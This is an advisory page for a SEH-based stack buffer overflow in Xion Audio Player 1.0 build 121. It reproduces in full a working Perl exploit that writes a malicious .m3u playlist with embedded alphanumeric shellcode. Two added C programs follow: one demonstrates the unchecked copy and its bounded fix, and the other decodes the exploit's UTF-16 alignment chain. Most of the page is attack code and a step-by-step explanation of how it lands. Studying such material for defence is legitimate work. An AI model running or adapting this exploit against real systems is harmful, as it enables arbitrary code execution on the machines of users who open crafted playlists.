Vendor: Xion Audio Player
By: Dragon Rider
CVSS: 9.3 (HIGH)
Type: Local and Remote Code Execution
CWE: 119
Product Name: Xion Audio Player
Affected Version From: 1.0 build 121
Affected Version To: 1.0 build 121
Patch Exists: YES
Related CWE: N/A
CPE: a:xion_audio_player:xion_audio_player
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

Xion Audio Player Local BOF

Xion Audio Player 1.0 build 121 is prone to a stack-based buffer overflow (CWE-119): it copies the contents of a playlist (.m3u) file into a fixed-size buffer without first checking the length of the entry. An attacker who gets a user to open a crafted playlist can overwrite the SEH record and execute arbitrary code in the context of the player; the "remote" vector is simply a playlist delivered by download, email or file share. Failed exploit attempts crash the player (denial of service).
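The copy-without-bounds-check pattern the advisory describes, as an added C example (this is not Xion's code; the 260-byte entry buffer, the guard word standing in for the SEH record, and the playlist handling are assumptions), with the bounded version beside it:

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* Hypothetical fixed-size buffer for one playlist entry. The real size in
 * Xion is not stated on the page. */
#define ENTRY_MAX 260
#define GUARD_VALUE 0xDEADBEEFu

/* Toy frame: the entry buffer followed by state that an overflow clobbers.
 * In the real bug that state includes the SEH record further up the stack. */
struct frame {
    char     entry[ENTRY_MAX];
    uint32_t guard;
};

/* Vulnerable pattern: trusts the line length and copies all of it.
 * A demo-only cap at sizeof(*f) keeps the write well-defined while still
 * letting an over-long entry run into the guard; the real code had no cap.
 * Returns 1 if the guard was overwritten, 0 otherwise. */
int load_entry_unchecked(struct frame *f, const char *line, size_t len)
{
    unsigned char *dst = (unsigned char *)f;
    f->guard = GUARD_VALUE;
    if (len > sizeof *f) len = sizeof *f;
    for (size_t i = 0; i < len; i++)
        dst[i] = (unsigned char)line[i];
    return f->guard != GUARD_VALUE;
}

/* Hardened pattern: refuse any entry that does not fit together with its NUL. */
int load_entry_checked(struct frame *f, const char *line, size_t len)
{
    f->guard = GUARD_VALUE;
    if (len >= ENTRY_MAX)
        return 1;                     /* the bounds check the original lacked */
    memcpy(f->entry, line, len);
    f->entry[len] = '\0';
    return 0;
}

typedef int (*loader_fn)(struct frame *, const char *, size_t);

/* Minimal M3U walker: hands every non-empty, non-comment line to the loader.
 * Returns how many lines the loader flagged (overflowed or rejected);
 * *accepted receives the count of lines loaded cleanly. */
int scan_m3u(const char *text, loader_fn loader, int *accepted)
{
    struct frame f;
    int bad = 0;
    *accepted = 0;
    for (const char *p = text; *p; ) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        if (len > 0 && p[0] != '#') {
            if (loader(&f, p, len)) bad++; else (*accepted)++;
        }
        p = nl ? nl + 1 : p + len;
    }
    return bad;
}

/* Constructed playlist: one ordinary entry plus one 600-byte entry, well past
 * ENTRY_MAX, in the spirit of the exploit's "A" x 254. */
static char g_playlist[1024];
static const char *sample_playlist(void)
{
    const char *head = "#EXTM3U\nC:\\music\\track01.mp3\n";
    size_t n = strlen(head);
    memcpy(g_playlist, head, n);
    memset(g_playlist + n, 'A', 600);
    g_playlist[n + 600] = '\n';
    g_playlist[n + 601] = '\0';
    return g_playlist;
}

/* Lines flagged on the sample: 1 overflow (unchecked) or 1 rejection (checked). */
int demo_bad_count(int use_checked)
{
    int accepted;
    return scan_m3u(sample_playlist(),
                    use_checked ? load_entry_checked : load_entry_unchecked, &accepted);
}

/* Lines loaded cleanly on the sample: 1 with either loader. */
int demo_accepted_count(int use_checked)
{
    int accepted;
    scan_m3u(sample_playlist(),
             use_checked ? load_entry_checked : load_entry_unchecked, &accepted);
    return accepted;
}

int main(void)
{
    printf("unchecked: %d overflow(s), %d accepted\n", demo_bad_count(0), demo_accepted_count(0));
    printf("checked:   %d rejected,    %d accepted\n", demo_bad_count(1), demo_accepted_count(1));
    return 0;
}
```

The unchecked loader shows the guard word (the stand-in for the SEH record) overwritten by the long entry; the checked loader rejects the same entry before any copy happens, which is the whole fix.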

Mitigation:

Upgrade to the latest version of Xion Audio Player

Exploit-DB raw data:

# [*] Vulnerability     : Xion Audio Player Local BOF
# [*] Discovered by     : Dragon Rider (http://securityreason.com/exploitalert/7392)
# [*]                     drag0n.rider(at)hotmail.com
# [*] Sploit written by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com)
# [*] Sploit released   : nov 3rd, 2009
# [*] Type              : local and remote code execution
# [*] OS                : Windows
# [*] Product           : Xion Audio Player
# [*] Versions affected : 1.0 build 121
# [*] Download from     : http://www.brothersoft.com/xion-audio-player-download-49404.html
# [*] -------------------------------------------------------------------------
# [*] Method            : SEH
# [*] Tested on         : XP SP3 En
# [*] Greetz&Tx to      : DellNull/EdiStrosar/F/P/W
# [*] -------------------------------------------------------------------------
#                                               MMMMM~.                          
#                                               MMMMM?.                          
#    MMMMMM8.  .=MMMMMMM.. MMMMMMMM, MMMMMMM8.  MMMMM?. MMMMMMM:   MMMMMMMMMM.   
#  MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMMMM?7MMMMMMMMMM: MMMMMMMMMMM:  
#  MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM?MMMMMZMMMMMI.MMMMMZMMMMM:  
#  MMMMM==7III~MMMMM=MMMMM=MMMMM$. 8MMMMMZ$$$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM:  
#  MMMMM=.     MMMMM=MMMMM=MMMMM7. 8MMMMM?    . MMMMM?NMMMM8MMMMMI.MMMMM+MMMMM:  
#  MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7. 8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM:  
#  =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7. .MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM:  
#  .:$MMMMMO7:..+OMMMMMO$=.MMMMM7.  ,IMMMMMMO$~ MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM:  
#     .,,,..      .,,,,.   .,,,,,     ..,,,..   .,,,,.. .,,...,,,. .,,,,..,,,,.  
#                                                                   eip hunters
# -----------------------------------------------------------------------------
# Script provided 'as is', without any warranty. 
# Use for educational purposes only.
#
#!/usr/bin/perl
# Writes a crafted .m3u playlist. The player widens the file's bytes to
# UTF-16 (each byte gets a 0x00 after it), which is why nSEH, the handler
# address and the alignment chain are written as 2-byte halves and only use
# bytes that still decode as useful instructions once zeros are interleaved.
use strict;
use warnings;

my $sploitfile="corelansploit.m3u";
my $junk = "\x41" x 254;          # filler up to the SEH record
my $nseh="\x58\x48";              # nSEH; widened: pop eax / add [eax],cl (harmless, walks on)
my $seh="\xf5\x48";               # handler; widened to 0x004800f5, a pop/pop/ret that survives widening
my $align="\x55";                 # push ebp
$align=$align."\x6d";             # alignment byte (widened 00 6d 00 = add [ebp+0],ch, harmless)
$align=$align."\x58";             # pop eax -> eax = ebp
$align=$align."\x6d";             # align
$align = $align."\x05\x10\x11";   # add eax, 0x11001000 (once widened)
$align=$align."\x6d";             # align
$align=$align."\x2d\x02\x11";     # sub eax, 0x11000200 -> eax = ebp + 0xE00
$align=$align."\x6d";             # align

my $jump = "\x50";                # push eax
$jump=$jump."\x6d";               # align
$jump=$jump."\xc3";               # ret -> jumps to eax (start of shellcode)

my $padding="A" x 73;             # filler so the shellcode sits where the push/ret lands (tuned to the tested build)

# Unicode-safe alphanumeric encoded shellcode; the decoder expects EAX to point at its own start
my $shellcode="PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLK8Q4KPKPKP4KQ5OLTKSLLERXM1JOTK0OLXDK1OO0M1JKPITK044KKQJN01WPTYVLE4Y0BTKW91WZLMKQ7RJKZTOKB4NDLDCE9UDKQOMTKQJKRFDKLLPKTKQOMLKQJKTKMLDKKQZKSYQLO4M4WSNQGPBDTKOPNPSUY0D8LLTKOPLLTKRPML6MTK2HKXZKM94K3PVPKPKPKPDK1XOL1ONQJVC0PVTIL853WP3K0PBHZPTJKTQO2HV8KNSZLNPWKOYWQSQQRLQSKPA";

my $filler = ("\xcc" x (17990-length($shellcode)));   # pad the file to a fixed total size
my $payload = $junk.$nseh.$seh.$align.$jump.$padding.$shellcode.$filler;
open(my $fh, '>', $sploitfile) or die "Cannot write $sploitfile: $!";
binmode($fh);                     # raw bytes, no newline translation on Windows
print $fh $payload;
print "Wrote " . length($payload)." bytes to $sploitfile\n";
close($fh);
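The SEH and alignment fields above are only two bytes each because the playlist bytes are widened to UTF-16LE before the overflow, so every byte in the chain has to remain a usable instruction with a 0x00 after it. This added C example (not part of the original exploit, and not Xion's code) reproduces that widening on the exploit's own byte strings and walks the result symbolically; it assumes a plain ANSI-to-Unicode widening (byte, 0x00) and that the handler address is the four widened bytes right after nSEH, which is what the exploit's layout implies.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* Byte strings copied from the exploit. */
#define JUNK_LEN 254
static const unsigned char NSEH[]  = "\x58\x48";
static const unsigned char SEH[]   = "\xf5\x48";
static const unsigned char ALIGN[] = "\x55\x6d\x58\x6d\x05\x10\x11\x6d\x2d\x02\x11\x6d";
static const unsigned char JUMP[]  = "\x50\x6d\xc3";
#define BYTES(s) (sizeof (s) - 1)

/* Widen raw bytes to UTF-16LE the way an ANSI->Unicode conversion does:
 * each byte is followed by 0x00. Returns the widened length, 0 if it won't fit. */
size_t widen_utf16le(const unsigned char *in, size_t n, unsigned char *out, size_t outsz)
{
    if (outsz < n * 2) return 0;
    for (size_t i = 0; i < n; i++) { out[2 * i] = in[i]; out[2 * i + 1] = 0x00; }
    return n * 2;
}

static uint32_t le32(const unsigned char *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Raw file bytes up to the jump: junk + nSEH + SEH + align + jump. */
static size_t build_head(unsigned char *buf, size_t bufsz)
{
    size_t off = 0;
    if (bufsz < JUNK_LEN + BYTES(NSEH) + BYTES(SEH) + BYTES(ALIGN) + BYTES(JUMP)) return 0;
    memset(buf, 'A', JUNK_LEN);                off += JUNK_LEN;
    memcpy(buf + off, NSEH, BYTES(NSEH));      off += BYTES(NSEH);
    memcpy(buf + off, SEH, BYTES(SEH));        off += BYTES(SEH);
    memcpy(buf + off, ALIGN, BYTES(ALIGN));    off += BYTES(ALIGN);
    memcpy(buf + off, JUMP, BYTES(JUMP));      off += BYTES(JUMP);
    return off;
}

static unsigned char g_raw[512], g_wide[1024];
static size_t widened_head(void)
{
    size_t n = build_head(g_raw, sizeof g_raw);
    return widen_utf16le(g_raw, n, g_wide, sizeof g_wide);
}

/* The dword that lands in the handler slot: "\xf5\x48" widened is f5 00 48 00,
 * i.e. 0x004800f5, so the 2-byte SEH field selects a full address. */
uint32_t seh_handler_value(void)
{
    widened_head();
    return le32(g_wide + (JUNK_LEN + BYTES(NSEH)) * 2);
}

/* Symbolic value: base 1 = EBP, 0 = unknown, plus an offset. */
struct sym { int base; int32_t off; };

/* Walk the widened bytes from nSEH (where pop/pop/ret lands execution),
 * decoding only the forms the chain uses, and return what "ret" jumps to. */
static struct sym target_of_ret(void)
{
    size_t n = widened_head(), ip = JUNK_LEN * 2;
    struct sym eax = {0, 0}, stack[8], none = {0, 0};
    int sp = 0;
    while (ip < n) {
        unsigned char op = g_wide[ip];
        if      (op == 0x00) ip += 3;                                        /* 00 /r disp8: add [reg+d8],r8 (interleaved zero) */
        else if (op == 0xf5) ip += 1;                                        /* cmc */
        else if (op == 0x55) { stack[sp++] = (struct sym){1, 0}; ip += 1; } /* push ebp */
        else if (op == 0x50) { stack[sp++] = eax; ip += 1; }                /* push eax */
        else if (op == 0x58) { eax = sp ? stack[--sp] : none; ip += 1; }    /* pop eax */
        else if (op == 0x05) { eax.off += (int32_t)le32(g_wide + ip + 1); ip += 5; } /* add eax, imm32 */
        else if (op == 0x2d) { eax.off -= (int32_t)le32(g_wide + ip + 1); ip += 5; } /* sub eax, imm32 */
        else if (op == 0xc3) return sp ? stack[--sp] : none;                /* ret */
        else break;                                                          /* anything else: chain broken */
    }
    return none;
}

/* Offset from EBP at which the chain expects the shellcode; -1 if the walk
 * could not resolve the ret target to an EBP-relative value. */
int32_t shellcode_offset_from_ebp(void)
{
    struct sym t = target_of_ret();
    return t.base == 1 ? t.off : -1;
}

int main(void)
{
    printf("SEH handler after widening : 0x%08x\n", (unsigned)seh_handler_value());
    printf("ret target                 : ebp + 0x%x\n", (unsigned)shellcode_offset_from_ebp());
    return 0;
}
```

The walk shows the chain is just push ebp / pop eax / add / sub / push eax / ret with the widening zeros absorbed as three-byte `add [reg+disp8], r8` instructions, leaving EAX at EBP + 0xE00; the 73-byte padding in the exploit exists to put the shellcode at exactly that spot on the tested build, so any port to another build has to re-tune both numbers.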